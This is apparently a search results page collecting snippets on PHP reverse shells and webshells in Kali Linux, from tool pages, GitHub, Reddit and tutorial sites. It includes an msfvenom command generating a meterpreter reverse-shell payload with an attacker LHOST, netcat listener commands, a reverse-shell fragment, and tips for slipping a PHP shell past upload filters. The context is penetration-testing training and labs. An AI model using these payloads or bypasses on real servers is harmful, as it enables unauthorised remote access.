🌐
Kali Linux
kali.org › tools › webshells
webshells | Kali Linux Tools
December 9, 2025 - Webshells Usage Examples root@kali:~# tree /usr/share/webshells/ /usr/share/webshells/ ├── asp │ ├── cmd-asp-5.1.asp │ └── cmdasp.asp ├── aspx │ └── cmdasp.aspx ├── cfm │ └── cfexec.cfm ├── jsp │ ├── cmdjsp.jsp │ └── jsp-reverse.jsp ├── perl │ ├── perlcmd.cgi │ └── perl-reverse-shell.pl └── php ├── findsock.c ├── php-backdoor.php ├── php-findsock-shell.php ├── php-reverse-shell.php ├── qsd-php-backdoor.php └── simple-backdoor.php 6 directories, 14 files root@kali:~#
🌐
GitHub
gist.github.com › devzspy › 238c0a37f860e059343fb291a9f30440
PHP Reverse Shell for Windows. Compliments /usr/share/webshells/php/php-reverse-shell.php on Kali Linux for Linux hosts · GitHub
PHP Reverse Shell for Windows. Compliments /usr/share/webshells/php/php-reverse-shell.php on Kali Linux for Linux hosts - php-reverse-shell-windows.php
Discussions

PHP reverse shell is not working.
Your kali machine is running PHP. When DVWA calls out to request the file, your kali machine executes the PHP. You have essentially created a backdoor on your Kali system. When you serve the file, do not have PHP running on your web server. Disable in in apache or serve the file with something like Python simple HTTP server so it just gets served as static text. More on reddit.com
🌐 r/AskNetsec
12
14
March 6, 2023
reverse shell php
For number 2 you mixed a command line reverse shell that gets executed by php (that’s what the „php -r“ stands for) with php script tags that get executed automatically. If you do just &3 2>&3"); ?> without php -r and without quotes it has a better chance to work More on reddit.com
🌐 r/tryhackme
10
1
September 13, 2023
windows php reverse shell
https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php This is like the best reverse shell for any OS. https://www.revshells.com/ Also this site is very useful More on reddit.com
🌐 r/oscp
12
15
January 11, 2023
uploading a reverse shell as an image.
This sounds like trail and error. I do not have a lot of info, but here is my best guess. If you want to exploit anything, try to understand how it works. Why do you want to upload a jpg? Is it the only format it accepts? If so, why does it only accept jpg? How to bypass this etc. Any errors? Any client-side checking? I see you changed the filetype, but did you also change the extension with ; after the extension? Like: image.jpg;.php Did you check what framework it is? Can you download the framework and check the source code to see how the filtering works? More on reddit.com
🌐 r/HowToHack
13
60
March 21, 2020
🌐
Pentestmonkey
pentestmonkey.net › tools › web-shells › php-reverse-shell
php-reverse-shell | pentestmonkey
It doesn’t seem to on the systems that I’ve tested it on (Gentoo Linux only so far). Additionally the PHP script attempts to daemonise itself and dissociate from the parent process to avoid this (though it rarely works in practise). Your browser will appear to hang when you access the reverse shell.
🌐
OffSec
offsec.com › home › kali linux › staged payloads from kali linux | pt phone home – php
Staged Payloads from Kali Linux | OffSec
July 29, 2024 - We will use a web call from our shellcode runner to retrieve and format this payload so that we can inject it into our payload to achieve a successful meterpreter reverse shell. Similar to before, our shellcode runner will include a download cradle that will retrieve our staged payload from our PHP page, except in this instance we’ll be pulling down shellcode. We’ll start with generating our shellcode using msfvendon · ┌──(kali㉿kali)-[~] └─$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.21 LPORT=443 EXITFUNC=thread -f ps1
🌐
GitHub
github.com › pentestmonkey › php-reverse-shell
GitHub - pentestmonkey/php-reverse-shell · GitHub
Contribute to pentestmonkey/php-reverse-shell development by creating an account on GitHub.
Starred by 2.8K users
Forked by 1.9K users
Languages   PHP
🌐
Kali Linux
kali.org › tools › b374k
b374k | Kali Linux Tools
December 9, 2025 - Script execution (php, perl, Python, ruby, java, node.js, c) Give you shell via bind/reverse shell connect · Simple packet crafter · Connect to DBMS (MySQL, mssql, oracle, sqlite, PostgreSQL, and many more using ODBC or PDO) SQL Explorer · Process list/Task manager ·
🌐
High on Coffee
highon.coffee › blog › reverse-shell-cheat-sheet
Reverse Shell Cheat Sheet: PHP, ASP, Netcat, Bash & Python
February 27, 2022 - root@kali:~# nc -nvlp 80 nc: listening on :: 80 ... nc: listening on 0.0.0.0 80 ... If you're attacking machine is behing a NAT router, you'll need to setup a port forward to the attacking machines IP / Port. ATTACKING-IP is the machine running your listening netcat session, port 80 is used in all examples below (for reasons mentioned above). The following section contains PHP reverse shells that have been tested working.
🌐
GitHub
github.com › ivan-sincek › php-reverse-shell
GitHub - ivan-sincek/php-reverse-shell: PHP shells that work on Linux OS, macOS, and Windows OS. · GitHub
Just a little refresh on the popular PHP reverse shell script pentestmonkey/php-reverse-shell. Credits to the original author! Works on Linux OS and macOS with /bin/sh and Windows OS with cmd.exe. Script will automatically detect the underlying OS. Works with both, ncat and multi/handler. Tested on: XAMPP for Linux v7.3.19 with PHP v7.3.19 on Kali Linux v2020.2 (64-bit), XAMPP for OS X v7.4.10 with PHP v7.4.10 on macOS Catalina v10.15.6 (64-bit), XAMPP for Windows v7.4.3 with PHP v7.4.3 on Windows 10 Enterprise OS (64-bit), Docker image nouphet/docker-php4 with PHP v4.4.0, Docker image steeze/php52-nginx with PHP v5.2.17.
Starred by 530 users
Forked by 153 users
Languages   PHP
Find elsewhere
🌐
Hacking Articles
hackingarticles.in › home › website hacking › web shells penetration testing
Web Shells Penetration Testing
September 25, 2019 - Now its turn to move towards our next php web shell which is php-reverse-shell.php which will open an outbound TCP connection from the webserver to a host and script made by “pentestmonkey”. A shell will be attached to the TCP connection ...
🌐
YouTube
youtube.com › watch
Learn Kali Linux Episode #72: Uploading a Reverse Shell to a Web Server - YouTube
Get The Complete Ethical Hacking Course Bundle! http://josephdelgadillo.com/product/hacking-bundle-2017/ Enroll in our newest course! https://www.udemy.com/e...
Published   June 27, 2018
🌐
GeeksforGeeks
geeksforgeeks.org › uploading-a-reverse-shell-to-a-web-server-in-kali-linux
Uploading a Reverse Shell to a Web Server in Kali Linux - GeeksforGeeks
November 7, 2022 - Step 2.1: Download a reverse shell from pentest monkey the file type is PHP. Step 2.2: Now, Open the PHP file and change the IP and Port number for accessing the machine.
🌐
GitLab
gitlab.com › kali linux › packages › webshells › repository
php/php-reverse-shell.php · kali/master · Kali Linux / Packages / webshells · GitLab
php-reverse-shell.php · Find file Blame History Permalink · Imported Upstream version 1.0 · 8525961d · Devon Kearns authored Jan 28, 2013 ·
🌐
GitHub
github.com › topics › php-reverse-shell
php-reverse-shell · GitHub Topics · GitHub
This is a simple PHP reverse shell that works on both Windows and Linux systems. It lets you specify the operating system via a query parameter, and will execute a PowerShell reverse shell on Windows or a bash reverse shell on Linux. php ...
🌐
101Labs
101labs.net › comptia-security › lab-41-getting-a-reverse-shell-on-a-server-through-a-file-upload
Lab 41 – Getting a reverse shell on a server through a file upload - 101Labs.net
March 1, 2024 - Let’s go to the “/uploads” page and click the “phpshell.phtml” file to make it run. When the code runs, it will establish a TCP connection to port 1234 of our Kali machine. Remember, this port is already being listened to by netcat. Return to the terminal where netcat is running. You will see that you now have a shell on the server.
🌐
GeeksforGeeks
geeksforgeeks.org › how-to-create-reverse-shells-with-netcat-in-kali-linux
How to Create Reverse Shells with Netcat in Kali Linux? - GeeksforGeeks
June 30, 2020 - We basically hack the webserver for gaining access to the system. We look into what is inside the web server and we want to have full control of the web server. Therefore we can download or access the uploaded content. In this article, we are using a reverse shell made with PHP.
🌐
Yeah Hub
yeahhub.com › home › getting reverse shell with php, python, perl and bash
Getting Reverse Shell with PHP, Python, Perl and Bash - Yeah Hub
July 30, 2025 - The goal is to have unique commands to run on the machine to control to get the reverse-shell, with redirection of standard input, standard output and error output. Each order is classified by technology/language. For each of them, the listener must place his machine in listening on a specific port. This step is often done by the utility of the sockets named “nectat“, available under Windows/Linux. Command to execute on the listener side on windows machine: ... For demonstrating this, we’ve two OS (Kali Linux and Windows 10) and in windows machine, netcat (nc) utility is already installed under c:\nc> directory.
🌐
Kali Linux
kali.org › tools › pwncat
pwncat | Kali Linux Tools
December 9, 2025 - -H, --header [str ...] Add HTTP ... a reverse shell onto the victim machine (via php, bash, nc, ncat or similar), start your listening server ......
🌐
Reddit
reddit.com › r/asknetsec › php reverse shell is not working.
r/AskNetsec on Reddit: PHP reverse shell is not working.
March 6, 2023 -

I am studying RFI and attempting to access the URL provided below: http://ubu/dvwa/vulnerabilities/fi/?page=http://kali/shell.php

"ubu" is my VM host, and "kali" is my local machine that has a reverse shell. However, when I run the above command on my machine, instead of getting access to the victim machine's shell, I am getting access to my own shell. I am using the shell code available at https://github.com/pentestmonkey/php-reverse-shell. Can you help me understand the reason behind this?

🌐
Hackercool Magazine
hackercoolmagazine.com › home › hacking › website hacking › webshells in kali linux
Webshells in Kali Linux - Hackercool Magazine
June 30, 2016 - Enter the php-reverse-shell. As its name says, it makes a reverse connection to our attacker system. In order for this shell to make a reverse connection, it needs an IP address. So before uploading this shell we need to change the IP address ...